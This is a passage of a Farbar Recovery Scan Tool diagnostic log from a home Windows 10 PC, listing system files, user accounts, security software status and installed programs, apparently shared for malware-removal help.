- 00004562 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task 2016-10-13 14:47 - 2014-11-02 17:45 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job 2016-10-11 21:24 - 2016-02-09 17:13 - 00000000 ____D C:\Users\Kyle Aniel\Documents\MultitrackStudio Songs 2016-10-11 19:55 - 2016-09-16 04:53 - 00003816 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater 2016-10-11 19:55 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed 2016-10-11 19:55 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\Macromed 2016-10-09 22:12 - 2016-07-29 22:43 - 00000000 ____D C:\Users\Kyle Aniel\.thumbnails 2016-10-07 21:33 - 2016-07-16 04:43 - 00471040 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe 2016-10-07 21:33 - 2016-07-16 04:43 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe 2016-10-07 21:33 - 2016-07-16 04:43 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe 2016-10-07 21:33 - 2016-07-16 04:43 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll 2016-10-07 21:33 - 2016-07-16 04:43 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll 2016-10-05 18:12 - 2016-07-16 04:47 - 00000000 __RHD C:\Users\Public\Libraries 2016-10-05 17:59 - 2016-04-05 18:57 - 00000000 ____D C:\Users\banie_000\AppData\Local\BlueStacks 2016-10-04 19:44 - 2016-09-16 05:08 - 00000000 ___DC C:\WINDOWS\Panther 2016-10-04 19:44 - 2016-09-16 05:02 - 00032216 _____ C:\WINDOWS\diagwrn.xml 2016-10-04 19:44 - 2016-09-16 05:02 - 00026570 _____ C:\WINDOWS\diagerr.xml 2016-10-03 19:51 - 2014-11-01 15:59 - 00000000 ____D C:\Program Files (x86)\Google 2016-10-03 13:09 - 2016-07-16 04:49 - 00828408 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2016-10-03 13:09 - 2016-07-16 04:49 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2016-10-02 20:57 - 2016-06-08 08:09 - 00000000 ___DC C:\Program Files\Staging 2016-10-01 15:44 - 2016-08-02 17:23 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\EZCA 2016-10-01 12:48 - 2016-08-21 20:28 - 00000000 ____D C:\Program Files (x86)\EZCA 2016-10-01 07:59 - 2016-08-13 17:40 - 00000000 ____D C:\ProgramData\Esellerate 2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12 2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ___SD C:\WINDOWS\system32\F12 2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\SysWOW64\setup 2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\setup 2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\oobe 2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\system32\appraiser 2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\Provisioning 2016-10-01 00:10 - 2016-07-16 04:47 - 00000000 ____D C:\WINDOWS\bcastdvr 2016-10-01 00:10 - 2016-07-15 23:04 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism 2016-10-01 00:10 - 2016-07-15 23:04 - 00000000 ____D C:\WINDOWS\system32\Sysprep 2016-10-01 00:10 - 2016-07-15 23:04 - 00000000 ____D C:\WINDOWS\system32\Dism 2016-09-24 17:41 - 2016-08-02 17:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EZCA 2016-09-22 21:17 - 2016-09-16 04:53 - 00000000 ____D C:\WINDOWS\System32\Tasks\NCH Software ==================== Files in the root of some directories ======= 2005-11-27 00:53 - 2005-11-27 00:53 - 0049152 _____ ( ) C:\Program Files\Interop.WIA.dll 2013-08-25 18:57 - 2013-08-25 18:57 - 0001968 _____ () C:\Program Files\License.txt 2016-09-12 14:54 - 2016-09-12 14:54 - 1703120 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Base.dll 2016-09-12 14:54 - 2016-09-12 14:54 - 3425792 ____C () C:\Program Files\PaintDotNet.Base.pdb 2016-09-12 14:55 - 2016-09-12 14:55 - 0638160 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Core.dll 2016-09-12 14:55 - 2016-09-12 14:55 - 2088448 ____C () C:\Program Files\PaintDotNet.Core.pdb 2016-09-12 14:55 - 2016-09-12 14:55 - 0086736 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Data.dll 2016-09-12 14:55 - 2016-09-12 14:55 - 0259584 ____C () C:\Program Files\PaintDotNet.Data.pdb 2016-09-12 14:55 - 2016-09-12 14:55 - 0191184 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Effects.dll 2016-09-12 14:55 - 2016-09-12 14:55 - 0488960 ____C () C:\Program Files\PaintDotNet.Effects.pdb 2016-09-12 14:55 - 2016-09-12 14:55 - 1764560 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.exe 2016-06-28 11:34 - 2016-06-28 11:34 - 0000534 _____ () C:\Program Files\PaintDotNet.exe.config 2016-09-12 14:55 - 2016-09-12 14:55 - 0333520 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Framework.dll 2016-09-12 14:55 - 2016-09-12 14:55 - 1152512 ____C () C:\Program Files\PaintDotNet.Framework.pdb 2016-09-12 14:55 - 2016-09-12 14:55 - 4308480 ____C () C:\Program Files\PaintDotNet.pdb 2016-09-12 14:55 - 2016-09-12 14:55 - 0414928 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.Resources.dll 2016-09-12 14:55 - 2016-09-12 14:55 - 0048640 ____C () C:\Program Files\PaintDotNet.Resources.pdb 2016-09-03 11:06 - 2016-09-03 11:06 - 0146082 ____R () C:\Program Files\PaintDotNet.Strings.3.cs.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0141848 ____R () C:\Program Files\PaintDotNet.Strings.3.da.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0147862 ____R () C:\Program Files\PaintDotNet.Strings.3.DE.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0147219 ____R () C:\Program Files\PaintDotNet.Strings.3.ES.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0158943 ____R () C:\Program Files\PaintDotNet.Strings.3.fa.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0140908 ____R () C:\Program Files\PaintDotNet.Strings.3.fi.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0149616 ____R () C:\Program Files\PaintDotNet.Strings.3.FR.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0189638 ____R () C:\Program Files\PaintDotNet.Strings.3.hi.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0146360 ____R () C:\Program Files\PaintDotNet.Strings.3.hu.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0145450 ____R () C:\Program Files\PaintDotNet.Strings.3.it.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0156109 ____R () C:\Program Files\PaintDotNet.Strings.3.JA.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0149217 ____R () C:\Program Files\PaintDotNet.Strings.3.KO.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0148057 ____R () C:\Program Files\PaintDotNet.Strings.3.lt.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0143678 ____R () C:\Program Files\PaintDotNet.Strings.3.nl.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0144619 ____R () C:\Program Files\PaintDotNet.Strings.3.pl.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0146572 ____R () C:\Program Files\PaintDotNet.Strings.3.PT-BR.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0146254 ____R () C:\Program Files\PaintDotNet.Strings.3.pt-PT.resources 2016-08-05 10:36 - 2016-08-05 10:36 - 0139694 ____R () C:\Program Files\PaintDotNet.Strings.3.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0172690 ____R () C:\Program Files\PaintDotNet.Strings.3.RU.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0143397 ____R () C:\Program Files\PaintDotNet.Strings.3.sv.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0136078 ____R () C:\Program Files\PaintDotNet.Strings.3.ZH-CN.resources 2016-09-03 11:06 - 2016-09-03 11:06 - 0138463 ____R () C:\Program Files\PaintDotNet.Strings.3.zh-TW.resources 2016-09-12 14:55 - 2016-09-12 14:55 - 0566480 _____ (dotPDN LLC) C:\Program Files\PaintDotNet.SystemLayer.dll 2016-09-12 14:55 - 2016-09-12 14:55 - 1083600 _____ () C:\Program Files\PaintDotNet.SystemLayer.Native.x64.dll 2016-09-12 14:55 - 2016-09-12 14:55 - 0988368 _____ () C:\Program Files\PaintDotNet.SystemLayer.Native.x86.dll 2016-09-12 14:55 - 2016-09-12 14:55 - 0818688 ____C () C:\Program Files\PaintDotNet.SystemLayer.pdb 2016-09-12 14:54 - 2016-09-12 14:54 - 0014032 _____ (dotPDN LLC) C:\Program Files\PdnRepair.exe 2015-09-24 19:08 - 2015-09-24 19:08 - 0000235 _____ () C:\Program Files\PdnRepair.exe.config 2016-09-12 14:54 - 2016-09-12 14:54 - 0013824 ____C () C:\Program Files\PdnRepair.pdb 2016-09-12 14:55 - 2016-09-12 14:55 - 0029904 _____ (dotPDN LLC) C:\Program Files\SetupNgen.exe 2010-04-21 00:57 - 2010-04-21 00:57 - 0000254 _____ () C:\Program Files\SetupNgen.exe.config 2016-09-12 14:55 - 2016-09-12 14:55 - 0028160 ____C () C:\Program Files\SetupNgen.pdb 2016-09-12 14:54 - 2016-09-12 14:54 - 0105680 _____ () C:\Program Files\ShellExtension_x64.dll 2016-09-12 14:54 - 2016-09-12 14:54 - 0096976 _____ () C:\Program Files\ShellExtension_x86.dll 2016-09-12 14:54 - 2016-09-12 14:54 - 0015568 _____ (dotPDN LLC) C:\Program Files\UpdateMonitor.exe 2015-09-24 19:10 - 2015-09-24 19:10 - 0000235 _____ () C:\Program Files\UpdateMonitor.exe.config 2016-09-12 14:54 - 2016-09-12 14:54 - 0013824 ____C () C:\Program Files\UpdateMonitor.pdb 2015-07-16 22:46 - 2016-01-10 00:02 - 0007598 _____ () C:\Users\banie_000\AppData\Local\Resmon.ResmonCfg 2014-12-12 16:48 - 2014-12-12 16:48 - 0000057 _____ () C:\ProgramData\Ament.ini 2015-12-05 11:28 - 2015-12-05 11:28 - 0000016 _____ () C:\ProgramData\mntemp 2015-12-05 11:28 - 2015-12-05 11:28 - 0004133 _____ () C:\ProgramData\rxsmznjf.zcp 2016-02-06 15:35 - 2016-02-06 15:35 - 0004865 _____ () C:\ProgramData\smxrsjou.kmd Files to move or delete: ==================== C:\Users\Kyle Aniel\fs9.exe C:\Users\Kyle Aniel\MetricCollection.dll ==================== Bamital & volsnap ====================== (There is no automatic fix for files that do not pass verification.) C:\WINDOWS\system32\winlogon.exe => File is digitally signed C:\WINDOWS\system32\wininit.exe => File is digitally signed C:\WINDOWS\explorer.exe => File is digitally signed C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed C:\WINDOWS\system32\svchost.exe => File is digitally signed C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed C:\WINDOWS\system32\services.exe => File is digitally signed C:\WINDOWS\system32\User32.dll => File is digitally signed C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed C:\WINDOWS\system32\userinit.exe => File is digitally signed C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed C:\WINDOWS\system32\rpcss.dll => File is digitally signed C:\WINDOWS\system32\dnsapi.dll => File is digitally signed C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2016-10-17 15:19 ==================== End of FRST.txt ============================
  5. Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016 Ran by Kyle Aniel (19-10-2016 14:57:04) Running from C:\Users\Kyle Aniel\Downloads Windows 10 Home Version 1607 (X64) (2016-09-16 12:11:12) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-23814709-2432651133-2868963390-500 - Administrator - Disabled) banie_000 (S-1-5-21-23814709-2432651133-2868963390-1010 - Administrator - Enabled) => C:\Users\banie_000 DefaultAccount (S-1-5-21-23814709-2432651133-2868963390-503 - Limited - Disabled) Guest (S-1-5-21-23814709-2432651133-2868963390-501 - Limited - Disabled) => C:\Users\Guest Izach Aniel (S-1-5-21-23814709-2432651133-2868963390-1002 - Limited - Enabled) => C:\Users\Izach Aniel Kyle Aniel (S-1-5-21-23814709-2432651133-2868963390-1001 - Limited - Enabled) => C:\Users\Kyle Aniel ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB} FW: Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 777 Captain (777-200) 1.1 (HKLM-x32\...\x772) (Version: 1.1.00 - © 1999-2013 Captain Sim) Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.020.20039 - Adobe Systems Incorporated) Adobe After Effects CC 2015 (HKLM-x32\...\{147EC100-14BE-45EF-AB42-35BAEE7D02F0}) (Version: 13.5.0 - Adobe Systems Incorporated) Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.185 - Adobe Systems Incorporated) Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.8.158 - Adobe Systems, Inc.) Aerosoft's - Airbus A320-A321 - FSX (HKLM-x32\...\Airbus A320-A321 - FSX) (Version: 1.30 - Aerosoft) Airport Design Editor 170 (HKLM-x32\...\{FACD7476-0E32-4A35-9741-1049BE879267}) (Version: 1.70.6029.0 - ScruffyDuck Software) Apple Application Support (32-bit) (HKLM-x32\...\{FE5C2FAA-118D-4509-B51D-3F71CC9E1B3E}) (Version: 4.3 - Apple Inc.) Apple Application Support (64-bit) (HKLM\...\{2937FD88-C9D6-4B82-B539-37CD0A572F42}) (Version: 4.3 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.) Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.) Audacity 2.1.1 (HKLM-x32\...\Audacity®_is1) (Version: 2.1.1 - Audacity Team) Auto Clicker v2.2 (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\{C0A7E4F3-82CC-416B-82C6-BA06AACFD635}_is1) (Version: 2.2 - MurGee.com) Autodesk Application Manager (HKLM-x32\...\Autodesk Application Manager) (Version: 4.0.69.0 - Autodesk) Autodesk Download Manager (HKLM-x32\...\{C897D9EC-13C6-4A22-ABF7-33F2126A7DB6}) (Version: 3.0.8.0 - Autodesk, Inc.) AV Voice Changer Software Diamond 9.0 (HKLM-x32\...\AV Voice Changer Software Diamond 9.0) (Version: 9.0.30 - AVSOFT Corp.) Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.911.151222 - ) B787 for FSX (HKLM-x32\...\InstallShield_{04241DC8-98A4-41AC-A419-E23D6B401AA0}) (Version: 1.00.0000 - AeroSim Co.,Ltd.) B787 for FSX (x32 Version: 1.00.0000 - AeroSim Co.,Ltd.) Hidden Bandicam (HKLM-x32\...\Bandicam) (Version: 2.4.1.903 - Bandisoft.com) Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version: - Bandisoft.com) Blender (HKLM\...\{70DFC1C6-C234-4B4D-87C1-E01793AAB130}) (Version: 2.78.0 - Blender Foundation) BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.5.61.6289 - BlueStack Systems, Inc.) Boeing 767-300 twelve repaints FSX & P3D (HKLM\...\{D2A24725-5F68-49B2-BF2F-07360D885699}) (Version: 1 - SkySpirit2010, Thomas Ruth, Emil Serafino) Boeing B737-823 Advanced VC FSX & P3D (HKLM\...\{330F6375-B0DB-4CDD-B1EB-B83C43810D11}) (Version: 1 - Project OpenSky, Alejandro Rojas Lucenda, FSRepaintsGER, Adam Murphy) Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.) Camtasia Studio 8 (HKLM-x32\...\{AF33D0D2-2627-4AC8-8473-FDBB7892129C}) (Version: 8.6.0.2079 - TechSmith Corporation) CaptainSim 757-200 PRO 4.2 (HKLM-x32\...\{5B57D4F1-66BA-448C-97F1-23F73517C694}_is1) (Version: - komu) CASecureBrowser (HKLM-x32\...\{FA3C5DAC-79B6-493B-9613-0FF5760AAEE5}) (Version: 8.0.0 - AIR) CCleaner (HKLM\...\CCleaner) (Version: 5.12 - Piriform) Chrome Remote Desktop Host (HKLM-x32\...\{159AA592-31AA-4EAC-A6CB-B47AB2CB1476}) (Version: 52.0.2743.48 - Google Inc.) Convert AVI to MP4 (HKLM-x32\...\{9ECE13D2-C028-44CB-8A96-A65196E7BBE7}_is1) (Version: - convertavitomp4.com) CoolSoft VirtualMIDISynth 1.15.2 (HKLM-x32\...\CoolSoft VirtualMIDISynth) (Version: 1.15.2.0 - CoolSoft) Cyberlink PhotoDirector (HKLM-x32\...\InstallShield_{5A454EC5-217A-42a5-8CE1-2DDEC4E70E01}) (Version: 5.0.3.5715 - CyberLink Corp.) Cyberlink PhotoDirector (Version: 5.0.3.5715 - CyberLink Corp.) Hidden CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.7.4016 - CyberLink Corp.) CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.4.4223 - CyberLink Corp.) CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.4.4218 - CyberLink Corp.) D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.4.0.0192 - Disc Soft Ltd) Debut Video Capture Software (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Debut) (Version: 3.01 - NCH Software) DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden DiscAuthor (x32 Version: 9.3.00 - Sony Corporation) Hidden EditVoicepack X (HKLM-x32\...\{493687F8-8D57-47C4-87B6-D46D7C5203BF}) (Version: 4.0.7 - Bevelstone Production) Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company) Evernote v. 5.3 (HKLM-x32\...\{E461B1AC-BC3C-11E3-B5B8-00163E98E7D6}) (Version: 5.3.0.3360 - Evernote Corp.) Express Burn Disc Burning Software (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\ExpressBurn) (Version: 5.06 - NCH Software) EZdok Camera for Microsoft Flight Simulator X (HKLM-x32\...\EZdok Camera for Microsoft Flight Simulator X) (Version: - ) f.lux (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Flux) (Version: - ) Family Protection (HKLM-x32\...\{08DE682A-3858-4591-9EBB-E5290E4DC3DD}) (Version: 2.6.116.1 - McAfee, Inc.) Flight Simulator First Officer version 2.3 (HKLM-x32\...\{AF5E7C31-99DF-4218-8E52-F1B3FE3FD9A3}_is1) (Version: 2.3 - Flight Simulator Addons) Free Video Compressor (HKLM-x32\...\{01554C33-4131-4BC7-9E6D-AF85E02BDF4F}_is1) (Version: - freevideocompressor.com) FS Recorder 2.1 for FSX (HKLM-x32\...\{EB74294F-B8FC-4387-BEBF-275E36C6076C}) (Version: 2.1.0.0 - Matthias Neusinger) FS Water Configurator 3.15 (HKLM\...\FS Water Configurator) (Version: - ) FSDreamTeam GSX FSX (HKLM-x32\...\FSDreamTeam GSX FSX_is1) (Version: 1.8.4 - VIRTUALI s.a.s.) FSDreamTeam Los Angeles International FSX (HKLM-x32\...\FSDreamTeam Los Angeles International FSX_is1) (Version: 1.6.0 - VIRTUALI Sagl) FSFO version 2.0 (HKLM-x32\...\{64C6044E-CA51-47FF-99D7-A175399334CF}_is1) (Version: 2.0 - Flight Simulator Addons) FSX FSND MD 83 version 2 (HKLM-x32\...\FSX FSND MD 83 version 2) (Version: - ) FSX Mission Editor (HKLM-x32\...\{DF5EC16F-6C64-45F8-A6E5-6D5D1F6DB0CA}) (Version: 1.0.3824 - FSAddon) GIMP 2.8.18 (HKLM\...\GIMP-2_is1) (Version: 2.8.18 - The GIMP Team) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 53.0.2785.143 - Google Inc.) Google Earth (HKLM-x32\...\{2C44ABB9-8621-4EF5-AF34-0886DCDA7C21}) (Version: 7.1.7.2600 - Google) Google Earth Plug-in (HKLM-x32\...\{57BB4801-61C8-4E74-9672-2160728A461E}) (Version: 7.1.5.1557 - Google) Google Talk Plugin (HKLM-x32\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 5.41.3.0 - Google) Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden Gramblr (HKLM\...\Gramblr) (Version: 2.7.9 - Gramblr Team) Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden HitFilm 4 Express (HKLM\...\{B266DF92-432D-4985-91C3-70148568AB79}) (Version: 4.0.5422.10801 - FXHOME) Hoyle Puzzle and Board Games Classic (HKLM-x32\...\Hoyle Puzzle and Board Games Classic) (Version: - ) HP 3D DriveGuard (HKLM-x32\...\{13133E99-B0D5-4143-B832-AAD55C62A41C}) (Version: 6.0.19.1 - Hewlett-Packard Company) HP CoolSense (HKLM-x32\...\{ADE2F6A7-E7BD-4955-BD66-30903B223DDF}) (Version: 2.20.41 - Hewlett-Packard Company) HP Documentation (HKLM-x32\...\{3C7B723A-1108-455C-B65B-FF2251E1E5A3}) (Version: 1.1.0.0 - Hewlett-Packard) HP ENVY 7640 series Basic Device Software (HKLM\...\{24BF3898-2667-4645-9448-8C6765B801A5}) (Version: 34.2.117.50647 - Hewlett-Packard Co.) HP ENVY 7640 series Help (HKLM-x32\...\{5845A5C9-AA03-4D91-9793-1A2563CE0129}) (Version: 34.0.0 - Hewlett Packard) HP ePrint (HKLM-x32\...\{2794875B-6CCF-48B8-84A5-5B10DB98BEE6}) (Version: 14.0.14176.1823 - Hewlett-Packard) HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP) HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7745.4851 - Hewlett-Packard) HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.11 - Hewlett-Packard) HP Support Assistant (HKLM-x32\...\{7FE016CC-DAA9-4E21-BD2F-98390D1E6F3F}) (Version: 7.6.23.8 - Hewlett-Packard Company) HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.0.30.219 - Hewlett-Packard Company) HP System Event Utility (HKLM-x32\...\{8B4EE87E-6D40-4C91-B5E8-0DC77DC412F1}) (Version: 1.4.1 - Hewlett-Packard Company) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) HP Utility Center (HKLM\...\{DCD5C599-5CCC-4E37-8938-FBB548D780C6}) (Version: 2.5.3 - Hewlett-Packard Company) HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company) HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden iCloud (HKLM\...\{4B48E22A-2FB0-4EFA-B99E-954B1E50CD69}) (Version: 5.1.0.34 - Apple Inc.) IcoFX 2.12 (HKLM-x32\...\IcoFX 2_is1) (Version: 2.12 - ) iFly Jets - The 737NG for FS2004 (HKLM-x32\...\iFly Jets - The 737NG for FS2004) (Version: - ) iFly Jets - The 737NG for FSX (HKLM-x32\...\iFly Jets - The 737NG for FSX) (Version: - ) iFunbox (v3.0.3109.1352) (HKLM-x32\...\iFunbox_is1) (Version: v3.0.3109.1352 - iFunbox DevTeam) IHA_MessageCenter (HKLM-x32\...\{35AC3CFF-8021-4804-9967-4919A663128D}) (Version: 2.0.68 - Verizon) Inst5675 (Version: 8.01.11 - Softex Inc.) Hidden Inst5676 (Version: 8.01.11 - Softex Inc.) Hidden Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation) Intel(R) PRO/Wireless Driver (HKLM\...\{ac7ad2d7-04b3-460c-b370-07e3d3e3aa4e}) (Version: 17.01.0000.1697 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4360 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.9.1000 - Intel Corporation) Intel(R) Smart Connect Technology (HKLM\...\{51AC86D3-C431-48AD-9195-0D6C930D07CD}) (Version: 4.2.41.2710 - Intel Corporation) Intel(R) Virtual Buttons (HKLM-x32\...\1992736F-C90A-481C-B21B-EE34CAD07387) (Version: 1.0.0.14 - Intel Corporation) Intel(R) Wireless Bluetooth(R) 4.0 (HKLM-x32\...\{C9324B6F-FC2B-4CA0-8C42-793D7099BDA1}) (Version: 17.0.1422.02 - Intel Corporation) iTunes (HKLM\...\{A31C5565-90D9-4615-AE13-94D86C3836C7}) (Version: 12.3.3.17 - Apple Inc.) Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation) Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation) Java 8 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218051F0}) (Version: 8.0.510 - Oracle Corporation) Java 8 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218060F0}) (Version: 8.0.600.27 - Oracle Corporation) Jed's Half-Life Model Viewer 1.3.6 (HKLM-x32\...\Jed's Half-Life Model Viewer) (Version: 1.3.6 - wunderboy.org) Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) 